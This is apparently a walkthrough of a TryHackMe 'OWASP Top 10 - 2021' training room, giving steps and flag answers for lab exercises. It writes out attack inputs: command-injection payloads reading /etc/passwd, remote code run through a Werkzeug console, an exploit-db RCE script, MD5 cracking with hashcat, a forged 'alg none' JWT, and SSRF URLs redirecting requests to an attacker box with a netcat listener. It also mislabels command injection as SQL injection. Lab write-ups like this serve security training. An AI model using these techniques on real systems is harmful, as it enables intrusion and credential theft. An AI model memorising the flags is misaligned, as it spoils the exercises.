OWASP Top 10 - 2021
This guide contains the answer and steps necessary to get to them for the OWASP Top 10 - 2021 room.
Table of contents
- Cryptographic Failures (Challenge)
- Command Injection
- Insecure Design
- Security Misconfiguration
- Vulnerable and Outdated Components - Lab
- Identification and Authentication Failures Practical
- Software Integrity Failures
- Data Integrity Failures
- Security Logging and Monitoring Failures
- Server-Side Request Forgery (SSRF)
Broken Access Control (IDOR Challenge)
Read and understand how IDOR works.
Deploy the machine and go to http://MACHINE_IP - Login with the username noot and the password test1234.
-
Look at other users' notes. What is the flag?
First we login into the page with the provided credentials
On this page we can view our notes. Notice the id parameter visible in the addressbar.
We can try different numbers to get to another users notes.
Click for answer
flag{fivefourthree}
Cryptographic Failures (Challenge)
Have a look around the web app. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
-
What is the name of the mentioned directory?
Looking at the source page of the website, we are given an interesting directory to look into.
Click for answer
/assets -
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Looking through the assets folder we see a database that might be of interest to us.
Click for answer
webapp.db -
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
We can use both methods to obtain the admin hash.
The first is to use
sqlite3to access the database and query to hashes.cmdsqlite3 webapp.db .tables PRAGMA table_info(users); SELECT * FROM users;
Another method is to use a viewer such as DB Browser for SQLite and view the database.
Click for answer
6eea9b7ef19179a06954edd0f6c05cebCrack the hash.
-
What is the admin's plaintext password?
If you can't tell from the hash itself we can use
hash-identifierto get the hashtype.
This seems to be a MD5 hash. We can crack this using hashcat.
cmdhashcat -m 0 6eea9b7ef19179a06954edd0f6c05ceb /usr/share/wordlists/rockyou.txt
Click for answer
qwertyuiop -
Log in as the admin. What is the flag?
With our newly found credentials, we can log in as an admin and get our flag.
Click for answer
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
Command Injection (need explanation)
-
What strange text file is in the website's root directory?
On the page we see an input box that is vulnerable to SQL injection.
An easy way yo test this is by writing `; ls'. If it is vulnerable, it should return a listing of the files in the current folder.
Click for answer
drpepper.txt -
How many non-root/non-service/non-daemon users are there?
We can look at all existing account by looking at the passwd file.
cmd; cat /etc/passwdAlthough unsure, what classifies as the mentioned account, we can see the amount in this list.
Click for answer
0 -
What user is this app running as?
For this we can use the
whoamicommand to find the current user.
Click for answer
apache -
What is the user's shell set as?
For this we can again look at the passwd file and look for usr entries.
cmd; cat /etc/passwd | grep 'usr'
Click for answer
sbin/nologin -
What version of Alpine Linux is running?
For this we need to look at the
alpine-releasefile.cmd; cat /etc/alpine-release
Click for answer
3.16.0
Insecure Design
-
What is the value of the flag in joseph's account?
Looking at the password reset form, we see there are several security questions. The color question seems to be easily guesable, as there are 11 basic colors.
After guessing the correct color, we get a new password for the account.
Now we can log in with these credentials and see Joseph's files.
Here we will also find our flag.
Click for answer
THM{Not_3ven_c4tz_c0uld_sav3_U!}
Security Misconfiguration
Navigate to http://10.10.30.226:86/console to access the Werkzeug console.
Use the Werkzeug console to run the following Python code to execute the ls -l command on the server:
import os; print(os.popen("ls -l").read())
-
What is the database file name (the one with the .db extension) in the current directory?
After inputting the command in the console, we get the following list of files. One of which is our database.
Click for answer
todo.db -
Modify the code to read the contents of the app.py file, which contains the application's source code. What is the value of the secret_flag variable in the source code?
To read the contents of the file
app.py, I canged the command to:pythonimport os; print(os.popen("cat app.py").read())
Click for answer
THM{Just_a_tiny_misconfiguration}
Vulnerable and Outdated Components - Lab
-
What is the content of the /opt/flag.txt file?
Looking at the site, we can see it is some sort of bookstore (CSE bookstore).
Searching exploit-db for any exploit gives us several results, but not the one we are looking for. We need to use the correct search terms. In this case:
cmdonline book storeThis gives us the RCE exploit we are looking for.
After downloading it, we can run it using pythin whilst adding the url of the site as an argument.
CMDsudo python3 ~/Downloads/47887.py http://10.10.30.226:84This gives us remote access to the database and enables us to find the flag.
Click for answer
THM{But_1ts_n0t_my_f4ult!}
Identification and Authentication Failures Practical
-
What is the flag that you found in darren's account?
We first register an account with the same name and an added whitespace in front.
Now we can log in with this account (remember to use the extra space) and find the flag.
Click for answer
fe86079416a21a3c99937fea8874b667Now try to do the same trick and see if you can log in as arthur.
-
What is the flag that you found in arthur's account?
Again, we first register an account with the same name and an added whitespace in front.
Now we can log in with this account (remember to use the extra space) and find the flag.
Click for answer
d9ac0f7db4fda460ac3edeb75d75e16e
Software Integrity Failures
-
What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?
Navigating to the supplied website and inputting the source's URL gives us the hash.
Click for answer
sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
Data Integrity Failures
-
Try logging into the application as guest. What is guest's account password?
Trying to log in to the site, we get a notification with default credentials we can use.
Click for answer
guest -
What is the name of the website's cookie containing a JWT token?
Looking at the cookies within the developer tools (F-12), we can see our JWT cookie.
Click for answer
jwt-sessionUse the knowledge gained in this task to modify the JWT token so that the application thinks you are the user "admin".
-
What is the flag presented to the admin user?
Now we take the first and second part of this session cookie and decode it with cyberchef from Base64. Then we change the
algargument tononeand the user toadmin.Then we encode both these string back to Bse64 seperately and combine them with a period between them (don't forget the trailing period).
cmdeyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk2MjUxMjU0fQ.
After refreshing the page, we can see our flag.
Click for answer
THM{Dont_take_cookies_from_strangers}
Security Logging and Monitoring Failures
-
What IP address is the attacker using?
After opening and analyzing the file, we can see the attackers IP address.
Click for answer
49.99.13.16 -
What kind of attack is being carried out?
Trying various usernames and passwords is a brute force log in attack.
Click for answer
Brute force
Server-Side Request Forgery (SSRF)
-
Explore the website. What is the only host allowed to access the admin area?
On the website, we can find the admin panel through the hamburger menu.
Here we can see that we are not allowed to access it.
Click for answer
localhost -
Check the "Download Resume" button. Where does the server parameter point to?
If we look at the download link, it points to an external server to get the resume.
Click for answer
secure-file-storage.com -
Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?
We must first modify the URL to redirect to our machine and specified port.
cmd10.10.42.94:8087/download?server=10.18.78.136:1337&id=75482342After setting up a listener using netcat we get a connection.
cmdnc -nlvp 1337
Click for answer
THM{Hello_Im_just_an_API_key}Going the Extra Mile: There's a way to use SSRF to gain access to the site's admin area. Can you find it?
Note: You won't need this flag to progress in the room. You are expected to do some research in order to achieve your goal.
To get access, we can try using the download redirect to redirect to itself so it thinks its coming from localhost.
I tried multiple things.
First, changing the server to the localhost (127.0.0.1) and added the admin url.
cmdhttp://10.10.42.94:8087/download?server=secure-file-storage.com:8087&id=75482342 http://10.10.42.94:8087/download?server=127.0.0.1:8087/admin&id=75482342This would still download the resume. Probably due to the id. I could not, however, remove that part, as I would get an error message saying
no file is selected.Using
#one can make the browser ignore certains strings. Url encoded this is%23. Adding this to the URL gives us a pdf version of the admin panel.cmdhttp://10.10.42.94:8087/download?server=127.0.0.1:8087/admin%23&id=75482342